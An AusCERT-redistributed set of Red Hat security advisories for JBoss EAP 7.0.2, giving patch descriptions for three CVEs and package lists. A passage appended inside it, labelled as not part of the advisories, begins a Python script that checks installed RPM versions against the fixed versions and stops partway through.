-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

===========================================================================
             AUSCERT External Security Bulletin Redistribution

                               ESB-2016.2112
     Important: JBoss Enterprise Application Platform on RHEL 6 and 7
                             9 September 2016

===========================================================================

        AusCERT Security Bulletin Summary
        ---------------------------------

Product:           JBoss Enterprise Application Platform
Publisher:         Red Hat
Operating System:  Red Hat Enterprise Linux Server 6
                   Red Hat Enterprise Linux Server 7
Impact/Access:     Execute Arbitrary Code/Commands -- Remote with User Interaction
                   Increased Privileges            -- Existing Account            
                   Provide Misleading Information  -- Remote with User Interaction
Resolution:        Patch/Upgrade
CVE Names:         CVE-2016-5406 CVE-2016-4993 CVE-2015-0254

Reference:         ESB-2016.1640
                   ESB-2016.0298
                   ESB-2015.2277

Original Bulletin: 
   https://rhn.redhat.com/errata/RHSA-2016-1838.html
   https://rhn.redhat.com/errata/RHSA-2016-1839.html
   https://rhn.redhat.com/errata/RHSA-2016-1840.html
   https://rhn.redhat.com/errata/RHSA-2016-1841.html

Comment: This bulletin contains four (4) Red Hat security advisories.

- --------------------------BEGIN INCLUDED TEXT--------------------

- -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

=====================================================================
                   Red Hat Security Advisory

Synopsis:          Important: JBoss Enterprise Application Platform 7.0.2 on RHEL 6
Advisory ID:       RHSA-2016:1838-01
Product:           Red Hat JBoss Enterprise Application Platform
Advisory URL:      https://rhn.redhat.com/errata/RHSA-2016-1838.html
Issue date:        2016-09-08
CVE Names:         CVE-2015-0254 CVE-2016-4993 CVE-2016-5406 
=====================================================================

1. Summary:

Updated packages that provide Red Hat JBoss Enterprise Application Platform
7.0.2, fix several bugs, and add various enhancements are now available for
Red Hat Enterprise Linux 6.

Red Hat Product Security has rated this update as having a security impact
of Important. A Common Vulnerability Scoring System (CVSS) base score,
which gives a detailed severity rating, is available for each vulnerability
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat JBoss Enterprise Application Platform 7.0 for RHEL 6 Server - noarch

3. Description:

Red Hat JBoss Enterprise Application Platform 7 is an application server
that serves as a middleware platform and is built on open standards and
compliant with the Java EE 7 specification.

This release serves as a replacement for Red Hat JBoss Enterprise
Application Platform 7.0.1. It includes bug fixes and enhancements. Refer
to the JBoss Enterprise Application Platform 7.0.2 Release Notes linked to
in the References section for information about the most significant bug
fixes and enhancements included in this release.

Security Fix(es):

* It was found that the Java Standard Tag Library (JSTL) allowed the
processing of untrusted XML documents to use external entity references,
which could access resources on the host system and, potentially, allow
arbitrary code execution. (CVE-2015-0254)

* It was reported that the EAP 7 application server and its Undertow web
server are vulnerable to the injection of arbitrary HTTP headers and to
HTTP response splitting, because user input is not sufficiently sanitized
and validated before it is used as part of an HTTP header value.
(CVE-2016-4993)

* The domain controller does not propagate its administrative RBAC
(role-based access control) configuration to some slave host controllers,
so the access restrictions configured on the domain controller are not
enforced there. An authenticated management user could use this to
escalate their privileges. (CVE-2016-5406)

Red Hat would like to thank Calum Hutton (NCC Group) and Mikhail Egorov
(Odin) for reporting CVE-2016-4993. The CVE-2016-5406 issue was discovered
by Tomaz Cerar (Red Hat).

4. Solution:

Before applying this update, back up your existing Red Hat JBoss Enterprise
Application Platform installation and deployed applications.

For details on how to apply this update, which includes the changes
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The JBoss server process must be restarted for the update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

1198606 - CVE-2015-0254 jakarta-taglibs-standard: XXE and RCE via XSL extension in JSTL XML tags
1359014 - CVE-2016-5406 EAP7 Privilege escalation when managing domain including earlier version slaves

6. JIRA issues fixed (https://issues.jboss.org/):

JBEAP-4731 - Tracker bug for the EAP 7.0.2 release for RHEL-6

7. Package List:

Red Hat JBoss Enterprise Application Platform 7.0 for RHEL 6 Server:

Source:
eap7-activemq-artemis-1.1.0-15.SP18_redhat_1.1.ep7.el6.src.rpm
eap7-apache-cxf-3.1.6-1.redhat_1.1.ep7.el6.src.rpm
eap7-jberet-1.2.1-1.Final_redhat_1.1.ep7.el6.src.rpm
eap7-jboss-jstl-api_1.2_spec-1.1.3-1.Final_redhat_1.1.ep7.el6.src.rpm
eap7-jboss-security-negotiation-3.0.3-1.Final_redhat_1.1.ep7.el6.src.rpm
eap7-jbossws-cxf-5.1.5-1.Final_redhat_1.1.ep7.el6.src.rpm
eap7-jbossws-spi-3.1.2-1.Final_redhat_1.1.ep7.el6.src.rpm
eap7-jgroups-3.6.10-1.Final_redhat_1.1.ep7.el6.src.rpm
eap7-mod_cluster-1.3.3-1.Final_redhat_1.1.ep7.el6.src.rpm
eap7-picketlink-bindings-2.5.5-3.SP3_redhat_1.1.ep7.el6.src.rpm
eap7-picketlink-federation-2.5.5-3.SP3_redhat_1.1.ep7.el6.src.rpm
eap7-resteasy-3.0.18-1.Final_redhat_1.1.ep7.el6.src.rpm
eap7-undertow-1.3.24-1.Final_redhat_1.1.ep7.el6.src.rpm
eap7-wildfly-7.0.2-2.GA_redhat_1.1.ep7.el6.src.rpm
eap7-wildfly-javadocs-7.0.2-1.GA_redhat_1.1.ep7.el6.src.rpm
eap7-wildfly-web-console-eap-2.8.27-1.Final_redhat_1.1.ep7.el6.src.rpm
eap7-wss4j-2.1.5-1.redhat_1.1.ep7.el6.src.rpm
eap7-xalan-j2-2.7.1-25.redhat_11.1.ep7.el6.src.rpm
eap7-xml-security-2.0.6-1.redhat_1.1.ep7.el6.src.rpm

noarch:
eap7-activemq-artemis-1.1.0-15.SP18_redhat_1.1.ep7.el6.noarch.rpm
eap7-activemq-artemis-cli-1.1.0-15.SP18_redhat_1.1.ep7.el6.noarch.rpm
eap7-activemq-artemis-commons-1.1.0-15.SP18_redhat_1.1.ep7.el6.noarch.rpm
eap7-activemq-artemis-core-client-1.1.0-15.SP18_redhat_1.1.ep7.el6.noarch.rpm
eap7-activemq-artemis-dto-1.1.0-15.SP18_redhat_1.1.ep7.el6.noarch.rpm
eap7-activemq-artemis-hornetq-protocol-1.1.0-15.SP18_redhat_1.1.ep7.el6.noarch.rpm
eap7-activemq-artemis-hqclient-protocol-1.1.0-15.SP18_redhat_1.1.ep7.el6.noarch.rpm
eap7-activemq-artemis-jms-client-1.1.0-15.SP18_redhat_1.1.ep7.el6.noarch.rpm
eap7-activemq-artemis-jms-server-1.1.0-15.SP18_redhat_1.1.ep7.el6.noarch.rpm
eap7-activemq-artemis-journal-1.1.0-15.SP18_redhat_1.1.ep7.el6.noarch.rpm
eap7-activemq-artemis-native-1.1.0-15.SP18_redhat_1.1.ep7.el6.noarch.rpm
eap7-activemq-artemis-ra-1.1.0-15.SP18_redhat_1.1.ep7.el6.noarch.rpm
eap7-activemq-artemis-selector-1.1.0-15.SP18_redhat_1.1.ep7.el6.noarch.rpm
eap7-activemq-artemis-server-1.1.0-15.SP18_redhat_1.1.ep7.el6.noarch.rpm
eap7-activemq-artemis-service-extensions-1.1.0-15.SP18_redhat_1.1.ep7.el6.noarch.rpm
eap7-apache-cxf-3.1.6-1.redhat_1.1.ep7.el6.noarch.rpm
eap7-apache-cxf-rt-3.1.6-1.redhat_1.1.ep7.el6.noarch.rpm
eap7-apache-cxf-services-3.1.6-1.redhat_1.1.ep7.el6.noarch.rpm
eap7-apache-cxf-tools-3.1.6-1.redhat_1.1.ep7.el6.noarch.rpm
eap7-jberet-1.2.1-1.Final_redhat_1.1.ep7.el6.noarch.rpm
eap7-jberet-core-1.2.1-1.Final_redhat_1.1.ep7.el6.noarch.rpm
eap7-jboss-jstl-api_1.2_spec-1.1.3-1.Final_redhat_1.1.ep7.el6.noarch.rpm
eap7-jboss-security-negotiation-3.0.3-1.Final_redhat_1.1.ep7.el6.noarch.rpm
eap7-jbossws-cxf-5.1.5-1.Final_redhat_1.1.ep7.el6.noarch.rpm
eap7-jbossws-spi-3.1.2-1.Final_redhat_1.1.ep7.el6.noarch.rpm
eap7-jgroups-3.6.10-1.Final_redhat_1.1.ep7.el6.noarch.rpm
eap7-mod_cluster-1.3.3-1.Final_redhat_1.1.ep7.el6.noarch.rpm
eap7-picketlink-api-2.5.5-3.SP3_redhat_1.1.ep7.el6.noarch.rpm
eap7-picketlink-bindings-2.5.5-3.SP3_redhat_1.1.ep7.el6.noarch.rpm
eap7-picketlink-common-2.5.5-3.SP3_redhat_1.1.ep7.el6.noarch.rpm
eap7-picketlink-config-2.5.5-3.SP3_redhat_1.1.ep7.el6.noarch.rpm
eap7-picketlink-federation-2.5.5-3.SP3_redhat_1.1.ep7.el6.noarch.rpm
eap7-picketlink-idm-api-2.5.5-3.SP3_redhat_1.1.ep7.el6.noarch.rpm
eap7-picketlink-idm-impl-2.5.5-3.SP3_redhat_1.1.ep7.el6.noarch.rpm
eap7-picketlink-idm-simple-schema-2.5.5-3.SP3_redhat_1.1.ep7.el6.noarch.rpm
eap7-picketlink-impl-2.5.5-3.SP3_redhat_1.1.ep7.el6.noarch.rpm
eap7-picketlink-wildfly8-2.5.5-3.SP3_redhat_1.1.ep7.el6.noarch.rpm
eap7-resteasy-3.0.18-1.Final_redhat_1.1.ep7.el6.noarch.rpm
eap7-resteasy-async-http-servlet-3.0-3.0.18-1.Final_redhat_1.1.ep7.el6.noarch.rpm
eap7-resteasy-atom-provider-3.0.18-1.Final_redhat_1.1.ep7.el6.noarch.rpm
eap7-resteasy-cdi-3.0.18-1.Final_redhat_1.1.ep7.el6.noarch.rpm
eap7-resteasy-client-3.0.18-1.Final_redhat_1.1.ep7.el6.noarch.rpm
eap7-resteasy-crypto-3.0.18-1.Final_redhat_1.1.ep7.el6.noarch.rpm
eap7-resteasy-jackson-provider-3.0.18-1.Final_redhat_1.1.ep7.el6.noarch.rpm
eap7-resteasy-jackson2-provider-3.0.18-1.Final_redhat_1.1.ep7.el6.noarch.rpm
eap7-resteasy-jaxb-provider-3.0.18-1.Final_redhat_1.1.ep7.el6.noarch.rpm
eap7-resteasy-jaxrs-3.0.18-1.Final_redhat_1.1.ep7.el6.noarch.rpm
eap7-resteasy-jettison-provider-3.0.18-1.Final_redhat_1.1.ep7.el6.noarch.rpm
eap7-resteasy-jose-jwt-3.0.18-1.Final_redhat_1.1.ep7.el6.noarch.rpm
eap7-resteasy-jsapi-3.0.18-1.Final_redhat_1.1.ep7.el6.noarch.rpm
eap7-resteasy-json-p-provider-3.0.18-1.Final_redhat_1.1.ep7.el6.noarch.rpm
eap7-resteasy-multipart-provider-3.0.18-1.Final_redhat_1.1.ep7.el6.noarch.rpm
eap7-resteasy-spring-3.0.18-1.Final_redhat_1.1.ep7.el6.noarch.rpm
eap7-resteasy-validator-provider-11-3.0.18-1.Final_redhat_1.1.ep7.el6.noarch.rpm
eap7-resteasy-yaml-provider-3.0.18-1.Final_redhat_1.1.ep7.el6.noarch.rpm
eap7-undertow-1.3.24-1.Final_redhat_1.1.ep7.el6.noarch.rpm
eap7-wildfly-7.0.2-2.GA_redhat_1.1.ep7.el6.noarch.rpm
eap7-wildfly-javadocs-7.0.2-1.GA_redhat_1.1.ep7.el6.noarch.rpm
eap7-wildfly-modules-7.0.2-2.GA_redhat_1.1.ep7.el6.noarch.rpm
eap7-wildfly-web-console-eap-2.8.27-1.Final_redhat_1.1.ep7.el6.noarch.rpm
eap7-wss4j-2.1.5-1.redhat_1.1.ep7.el6.noarch.rpm
eap7-wss4j-bindings-2.1.5-1.redhat_1.1.ep7.el6.noarch.rpm
eap7-wss4j-policy-2.1.5-1.redhat_1.1.ep7.el6.noarch.rpm
eap7-wss4j-ws-security-common-2.1.5-1.redhat_1.1.ep7.el6.noarch.rpm
eap7-wss4j-ws-security-dom-2.1.5-1.redhat_1.1.ep7.el6.noarch.rpm
eap7-wss4j-ws-security-policy-stax-2.1.5-1.redhat_1.1.ep7.el6.noarch.rpm
eap7-wss4j-ws-security-stax-2.1.5-1.redhat_1.1.ep7.el6.noarch.rpm
eap7-xalan-j2-2.7.1-25.redhat_11.1.ep7.el6.noarch.rpm
eap7-xml-security-2.0.6-1.redhat_1.1.ep7.el6.noarch.rpm

These packages are GPG signed by Red Hat for security.  Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/

8. References:

https://access.redhat.com/security/cve/CVE-2015-0254
https://access.redhat.com/security/cve/CVE-2016-4993
https://access.redhat.com/security/cve/CVE-2016-5406
https://access.redhat.com/security/updates/classification/#important
https://access.redhat.com/documentation/en/red-hat-jboss-enterprise-application-platform/version-7.0/702-release-notes/
https://access.redhat.com/documentation/en/red-hat-jboss-enterprise-application-platform/?version=7.0/

9. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/

Copyright 2016 Red Hat, Inc.
- -----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iD8DBQFX0bDqXlSAg2UNWIIRAnwgAKCMklErMwXg/gMEc52/KVQF5UmyvQCfY71E
CrpqL0JbtmtT9732KVw3ccg=
=IkPn
- -----END PGP SIGNATURE-----

- -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

=====================================================================
                   Red Hat Security Advisory

Synopsis:          Important: JBoss Enterprise Application Platform 7.0.2 for RHEL 7
Advisory ID:       RHSA-2016:1839-01
Product:           Red Hat JBoss Enterprise Application Platform
Advisory URL:      https://rhn.redhat.com/errata/RHSA-2016-1839.html
Issue date:        2016-09-08
CVE Names:         CVE-2015-0254 CVE-2016-4993 CVE-2016-5406 
=====================================================================

1. Summary:

Updated packages that provide Red Hat JBoss Enterprise Application Platform
7.0.2, fix several bugs, and add various enhancements are now available for
Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact
of Important. A Common Vulnerability Scoring System (CVSS) base score,
which gives a detailed severity rating, is available for each vulnerability
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat JBoss Enterprise Application Platform 7.0 for RHEL 7 Server - noarch

3. Description:

Red Hat JBoss Enterprise Application Platform 7 is an application server
that serves as a middleware platform and is built on open standards and
compliant with the Java EE 7 specification.

This release serves as a replacement for Red Hat JBoss Enterprise
Application Platform 7.0.1. It includes bug fixes and enhancements. Refer
to the JBoss Enterprise Application Platform 7.0.2 Release Notes linked to
in the References section for information about the most significant bug
fixes and enhancements included in this release.

Security Fix(es):

* It was found that the Java Standard Tag Library (JSTL) allowed the
processing of untrusted XML documents to use external entity references,
which could access resources on the host system and, potentially, allow
arbitrary code execution. (CVE-2015-0254)

* It was reported that the EAP 7 application server and its Undertow web
server are vulnerable to the injection of arbitrary HTTP headers and to
HTTP response splitting, because user input is not sufficiently sanitized
and validated before it is used as part of an HTTP header value.
(CVE-2016-4993)

* The domain controller does not propagate its administrative RBAC
(role-based access control) configuration to some slave host controllers,
so the access restrictions configured on the domain controller are not
enforced there. An authenticated management user could use this to
escalate their privileges. (CVE-2016-5406)

Red Hat would like to thank Calum Hutton (NCC Group) and Mikhail Egorov
(Odin) for reporting CVE-2016-4993. The CVE-2016-5406 issue was discovered
by Tomaz Cerar (Red Hat).

4. Solution:

Before applying this update, back up your existing Red Hat JBoss Enterprise
Application Platform installation and deployed applications.

For details on how to apply this update, which includes the changes
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The JBoss server process must be restarted for the update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

1198606 - CVE-2015-0254 jakarta-taglibs-standard: XXE and RCE via XSL extension in JSTL XML tags
1359014 - CVE-2016-5406 EAP7 Privilege escalation when managing domain including earlier version slaves

6. JIRA issues fixed (https://issues.jboss.org/):

JBEAP-4732 - Tracker bug for the EAP 7.0.2 release for RHEL-7

7. Package List:

Red Hat JBoss Enterprise Application Platform 7.0 for RHEL 7 Server:

Source:
eap7-activemq-artemis-1.1.0-15.SP18_redhat_1.1.ep7.el7.src.rpm
eap7-apache-cxf-3.1.6-1.redhat_1.1.ep7.el7.src.rpm
eap7-jberet-1.2.1-1.Final_redhat_1.1.ep7.el7.src.rpm
eap7-jboss-jstl-api_1.2_spec-1.1.3-1.Final_redhat_1.1.ep7.el7.src.rpm
eap7-jboss-security-negotiation-3.0.3-1.Final_redhat_1.1.ep7.el7.src.rpm
eap7-jbossws-common-3.1.3-1.Final_redhat_1.1.ep7.el7.src.rpm
eap7-jbossws-cxf-5.1.5-1.Final_redhat_1.1.ep7.el7.src.rpm
eap7-jbossws-spi-3.1.2-1.Final_redhat_1.1.ep7.el7.src.rpm
eap7-jgroups-3.6.10-1.Final_redhat_1.1.ep7.el7.src.rpm
eap7-mod_cluster-1.3.3-1.Final_redhat_1.1.ep7.el7.src.rpm
eap7-picketbox-4.9.7-1.Final_redhat_1.1.ep7.el7.src.rpm
eap7-picketlink-bindings-2.5.5-3.SP3_redhat_1.1.ep7.el7.src.rpm
eap7-picketlink-federation-2.5.5-3.SP3_redhat_1.1.ep7.el7.src.rpm
eap7-resteasy-3.0.18-1.Final_redhat_1.1.ep7.el7.src.rpm
eap7-undertow-1.3.24-1.Final_redhat_1.1.ep7.el7.src.rpm
eap7-wildfly-7.0.2-2.GA_redhat_1.1.ep7.el7.src.rpm
eap7-wildfly-javadocs-7.0.2-1.GA_redhat_1.1.ep7.el7.src.rpm
eap7-wildfly-web-console-eap-2.8.27-1.Final_redhat_1.1.ep7.el7.src.rpm
eap7-wss4j-2.1.5-1.redhat_1.1.ep7.el7.src.rpm
eap7-xalan-j2-2.7.1-25.redhat_11.1.ep7.el7.src.rpm
eap7-xml-security-2.0.6-1.redhat_1.1.ep7.el7.src.rpm

noarch:
eap7-activemq-artemis-1.1.0-15.SP18_redhat_1.1.ep7.el7.noarch.rpm
eap7-activemq-artemis-cli-1.1.0-15.SP18_redhat_1.1.ep7.el7.noarch.rpm
eap7-activemq-artemis-commons-1.1.0-15.SP18_redhat_1.1.ep7.el7.noarch.rpm
eap7-activemq-artemis-core-client-1.1.0-15.SP18_redhat_1.1.ep7.el7.noarch.rpm
eap7-activemq-artemis-dto-1.1.0-15.SP18_redhat_1.1.ep7.el7.noarch.rpm
eap7-activemq-artemis-hornetq-protocol-1.1.0-15.SP18_redhat_1.1.ep7.el7.noarch.rpm
eap7-activemq-artemis-hqclient-protocol-1.1.0-15.SP18_redhat_1.1.ep7.el7.noarch.rpm
eap7-activemq-artemis-jms-client-1.1.0-15.SP18_redhat_1.1.ep7.el7.noarch.rpm
eap7-activemq-artemis-jms-server-1.1.0-15.SP18_redhat_1.1.ep7.el7.noarch.rpm
eap7-activemq-artemis-journal-1.1.0-15.SP18_redhat_1.1.ep7.el7.noarch.rpm
eap7-activemq-artemis-native-1.1.0-15.SP18_redhat_1.1.ep7.el7.noarch.rpm
eap7-activemq-artemis-ra-1.1.0-15.SP18_redhat_1.1.ep7.el7.noarch.rpm
eap7-activemq-artemis-selector-1.1.0-15.SP18_redhat_1.1.ep7.el7.noarch.rpm
eap7-activemq-artemis-server-1.1.0-15.SP18_redhat_1.1.ep7.el7.noarch.rpm
eap7-activemq-artemis-service-extensions-1.1.0-15.SP18_redhat_1.1.ep7.el7.noarch.rpm
eap7-apache-cxf-3.1.6-1.redhat_1.1.ep7.el7.noarch.rpm
eap7-apache-cxf-rt-3.1.6-1.redhat_1.1.ep7.el7.noarch.rpm
eap7-apache-cxf-services-3.1.6-1.redhat_1.1.ep7.el7.noarch.rpm
eap7-apache-cxf-tools-3.1.6-1.redhat_1.1.ep7.el7.noarch.rpm
eap7-jberet-1.2.1-1.Final_redhat_1.1.ep7.el7.noarch.rpm
eap7-jberet-core-1.2.1-1.Final_redhat_1.1.ep7.el7.noarch.rpm
eap7-jboss-jstl-api_1.2_spec-1.1.3-1.Final_redhat_1.1.ep7.el7.noarch.rpm
eap7-jboss-security-negotiation-3.0.3-1.Final_redhat_1.1.ep7.el7.noarch.rpm
eap7-jbossws-common-3.1.3-1.Final_redhat_1.1.ep7.el7.noarch.rpm
eap7-jbossws-cxf-5.1.5-1.Final_redhat_1.1.ep7.el7.noarch.rpm
eap7-jbossws-spi-3.1.2-1.Final_redhat_1.1.ep7.el7.noarch.rpm
eap7-jgroups-3.6.10-1.Final_redhat_1.1.ep7.el7.noarch.rpm
eap7-mod_cluster-1.3.3-1.Final_redhat_1.1.ep7.el7.noarch.rpm
eap7-picketbox-4.9.7-1.Final_redhat_1.1.ep7.el7.noarch.rpm
eap7-picketbox-infinispan-4.9.7-1.Final_redhat_1.1.ep7.el7.noarch.rpm
eap7-picketlink-api-2.5.5-3.SP3_redhat_1.1.ep7.el7.noarch.rpm
eap7-picketlink-bindings-2.5.5-3.SP3_redhat_1.1.ep7.el7.noarch.rpm
eap7-picketlink-common-2.5.5-3.SP3_redhat_1.1.ep7.el7.noarch.rpm
eap7-picketlink-config-2.5.5-3.SP3_redhat_1.1.ep7.el7.noarch.rpm
eap7-picketlink-federation-2.5.5-3.SP3_redhat_1.1.ep7.el7.noarch.rpm
eap7-picketlink-idm-api-2.5.5-3.SP3_redhat_1.1.ep7.el7.noarch.rpm
eap7-picketlink-idm-impl-2.5.5-3.SP3_redhat_1.1.ep7.el7.noarch.rpm
eap7-picketlink-idm-simple-schema-2.5.5-3.SP3_redhat_1.1.ep7.el7.noarch.rpm
eap7-picketlink-impl-2.5.5-3.SP3_redhat_1.1.ep7.el7.noarch.rpm
eap7-picketlink-wildfly8-2.5.5-3.SP3_redhat_1.1.ep7.el7.noarch.rpm
eap7-resteasy-3.0.18-1.Final_redhat_1.1.ep7.el7.noarch.rpm
eap7-resteasy-async-http-servlet-3.0-3.0.18-1.Final_redhat_1.1.ep7.el7.noarch.rpm
eap7-resteasy-atom-provider-3.0.18-1.Final_redhat_1.1.ep7.el7.noarch.rpm
eap7-resteasy-cdi-3.0.18-1.Final_redhat_1.1.ep7.el7.noarch.rpm
eap7-resteasy-client-3.0.18-1.Final_redhat_1.1.ep7.el7.noarch.rpm
eap7-resteasy-crypto-3.0.18-1.Final_redhat_1.1.ep7.el7.noarch.rpm
eap7-resteasy-jackson-provider-3.0.18-1.Final_redhat_1.1.ep7.el7.noarch.rpm
eap7-resteasy-jackson2-provider-3.0.18-1.Final_redhat_1.1.ep7.el7.noarch.rpm
eap7-resteasy-jaxb-provider-3.0.18-1.Final_redhat_1.1.ep7.el7.noarch.rpm
eap7-resteasy-jaxrs-3.0.18-1.Final_redhat_1.1.ep7.el7.noarch.rpm
eap7-resteasy-jettison-provider-3.0.18-1.Final_redhat_1.1.ep7.el7.noarch.rpm
eap7-resteasy-jose-jwt-3.0.18-1.Final_redhat_1.1.ep7.el7.noarch.rpm
eap7-resteasy-jsapi-3.0.18-1.Final_redhat_1.1.ep7.el7.noarch.rpm
eap7-resteasy-json-p-provider-3.0.18-1.Final_redhat_1.1.ep7.el7.noarch.rpm
eap7-resteasy-multipart-provider-3.0.18-1.Final_redhat_1.1.ep7.el7.noarch.rpm
eap7-resteasy-spring-3.0.18-1.Final_redhat_1.1.ep7.el7.noarch.rpm
eap7-resteasy-validator-provider-11-3.0.18-1.Final_redhat_1.1.ep7.el7.noarch.rpm
eap7-resteasy-yaml-provider-3.0.18-1.Final_redhat_1.1.ep7.el7.noarch.rpm
eap7-undertow-1.3.24-1.Final_redhat_1.1.ep7.el7.noarch.rpm
eap7-wildfly-7.0.2-2.GA_redhat_1.1.ep7.el7.noarch.rpm
eap7-wildfly-javadocs-7.0.2-1.GA_redhat_1.1.ep7.el7.noarch.rpm
eap7-wildfly-modules-7.0.2-2.GA_redhat_1.1.ep7.el7.noarch.rpm
eap7-wildfly-web-console-eap-2.8.27-1.Final_redhat_1.1.ep7.el7.noarch.rpm
eap7-wss4j-2.1.5-1.redhat_1.1.ep7.el7.noarch.rpm
eap7-wss4j-bindings-2.1.5-1.redhat_1.1.ep7.el7.noarch.rpm
eap7-wss4j-policy-2.1.5-1.redhat_1.1.ep7.el7.noarch.rpm
eap7-wss4j-ws-security-common-2.1.5-1.redhat_1.1.ep7.el7.noarch.rpm
eap7-wss4j-ws-security-dom-2.1.5-1.redhat_1.1.ep7.el7.noarch.rpm
eap7-wss4j-ws-security-policy-stax-2.1.5-1.redhat_1.1.ep7.el7.noarch.rpm
eap7-wss4j-ws-security-stax-2.1.5-1.redhat_1.1.ep7.el7.noarch.rpm
eap7-xalan-j2-2.7.1-25.redhat_11.1.ep7.el7.noarch.rpm
eap7-xml-security-2.0.6-1.redhat_1.1.ep7.el7.noarch.rpm

These packages are GPG signed by Red Hat for security.  Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/

8. References:

https://access.redhat.com/security/cve/CVE-2015-0254
https://access.redhat.com/security/cve/CVE-2016-4993
https://access.redhat.com/security/cve/CVE-2016-5406
https://access.redhat.com/security/updates/classification/#important
https://access.redhat.com/documentation/en/red-hat-jboss-enterprise-application-platform/version-7.0/702-release-notes/
https://access.redhat.com/documentation/en/red-hat-jboss-enterprise-application-platform/?version=7.0

9. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/

Copyright 2016 Red Hat, Inc.
- -----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iD8DBQFX0bD7XlSAg2UNWIIRApIiAJ9VMQ7SJqr5M74cnRmrgATj0ftMRwCeMDXz
8sMeQvqNC9hnIFkriU/AN5A=
=g7wS
- -----END PGP SIGNATURE-----

- -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

=====================================================================
                   Red Hat Security Advisory

Synopsis:          Important: eap7-jboss-ec2-eap security, bug fix, and enhancement update
Advisory ID:       RHSA-2016:1840-01
Product:           Red Hat JBoss Enterprise Application Platform
Advisory URL:      https://rhn.redhat.com/errata/RHSA-2016-1840.html
Issue date:        2016-09-08
CVE Names:         CVE-2015-0254 CVE-2016-4993 CVE-2016-5406 
=====================================================================

1. Summary:

An update for eap7-jboss-ec2-eap is now available for Red Hat JBoss
Enterprise Application Platform 7.0 for RHEL 6 and Red Hat JBoss Enterprise
Application Platform 7.0 for RHEL 7.

Red Hat Product Security has rated this update as having a security impact
of Important. A Common Vulnerability Scoring System (CVSS) base score,
which gives a detailed severity rating, is available for each vulnerability
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat JBoss Enterprise Application Platform 7.0 for RHEL 6 Server - noarch
Red Hat JBoss Enterprise Application Platform 7.0 for RHEL 7 Server - noarch

3. Description:

The eap7-jboss-ec2-eap packages provide scripts for Red Hat JBoss
Enterprise Application Platform running on the Amazon Web Services (AWS)
Elastic Compute Cloud (EC2).

With this update, the eap7-jboss-ec2-eap package has been updated to ensure
compatibility with Red Hat JBoss Enterprise Application Platform 7.0.2.
Refer to the JBoss Enterprise Application Platform 7.0.2 Release Notes,
linked to in the References section, for information about the most
significant bug fixes and enhancements included in this release.

Security Fix(es):

* It was found that the Java Standard Tag Library (JSTL) allowed the
processing of untrusted XML documents to use external entity references,
which could access resources on the host system and, potentially, allow
arbitrary code execution. (CVE-2015-0254)

* It was reported that the EAP 7 application server and its Undertow web
server are vulnerable to the injection of arbitrary HTTP headers and to
HTTP response splitting, because user input is not sufficiently sanitized
and validated before it is used as part of an HTTP header value.
(CVE-2016-4993)

* The domain controller does not propagate its administrative RBAC
(role-based access control) configuration to some slave host controllers,
so the access restrictions configured on the domain controller are not
enforced there. An authenticated management user could use this to
escalate their privileges. (CVE-2016-5406)

Red Hat would like to thank Calum Hutton (NCC Group) and Mikhail Egorov
(Odin) for reporting CVE-2016-4993. The CVE-2016-5406 issue was discovered
by Tomaz Cerar (Red Hat).

4. Solution:

Before applying this update, back up your existing Red Hat JBoss Enterprise
Application Platform installation and deployed applications.

For details on how to apply this update, which includes the changes
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The JBoss server process must be restarted for the update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

1198606 - CVE-2015-0254 jakarta-taglibs-standard: XXE and RCE via XSL extension in JSTL XML tags
1359014 - CVE-2016-5406 EAP7 Privilege escalation when managing domain including earlier version slaves

6. JIRA issues fixed (https://issues.jboss.org/):

JBEAP-4734 - jboss-ec2-eap for EAP 7.0.2

7. Package List:

Red Hat JBoss Enterprise Application Platform 7.0 for RHEL 6 Server:

Source:
eap7-jboss-ec2-eap-7.0.2-2.GA_redhat_1.ep7.el6.src.rpm

noarch:
eap7-jboss-ec2-eap-7.0.2-2.GA_redhat_1.ep7.el6.noarch.rpm
eap7-jboss-ec2-eap-samples-7.0.2-2.GA_redhat_1.ep7.el6.noarch.rpm

Red Hat JBoss Enterprise Application Platform 7.0 for RHEL 7 Server:

Source:
eap7-jboss-ec2-eap-7.0.2-2.GA_redhat_1.ep7.el7.src.rpm

noarch:
eap7-jboss-ec2-eap-7.0.2-2.GA_redhat_1.ep7.el7.noarch.rpm
eap7-jboss-ec2-eap-samples-7.0.2-2.GA_redhat_1.ep7.el7.noarch.rpm

These packages are GPG signed by Red Hat for security.  Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
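An added example that is not part of the Red Hat advisories: the package
lists above (RHSA-2016:1838 for RHEL 6, RHSA-2016:1839 for RHEL 7 and
RHSA-2016:1840 for the EC2 scripts) name the fixed NVRs, and the question a
practitioner has after applying the update is whether every installed eap7
package is at or above them. The Python script below answers that offline: it
parses the advisory file names, parses `rpm -qa` output, and compares version
and release with a port of librpm's rpmvercmp() ordering (tilde, caret and
numeric-versus-alpha segments included). The advisory entries in it are copied
from the lists above; the `rpm -qa` sample is constructed for the example and
deliberately contains a stale undertow, jstl and wildfly-modules build plus a
made-up package the advisories do not cover.

```python
import sys

# Fixed package NVRs copied from the advisory package lists (RHEL 6 and EC2).
ADVISORY_PACKAGES = [
    "eap7-jboss-jstl-api_1.2_spec-1.1.3-1.Final_redhat_1.1.ep7.el6.noarch.rpm",
    "eap7-undertow-1.3.24-1.Final_redhat_1.1.ep7.el6.noarch.rpm",
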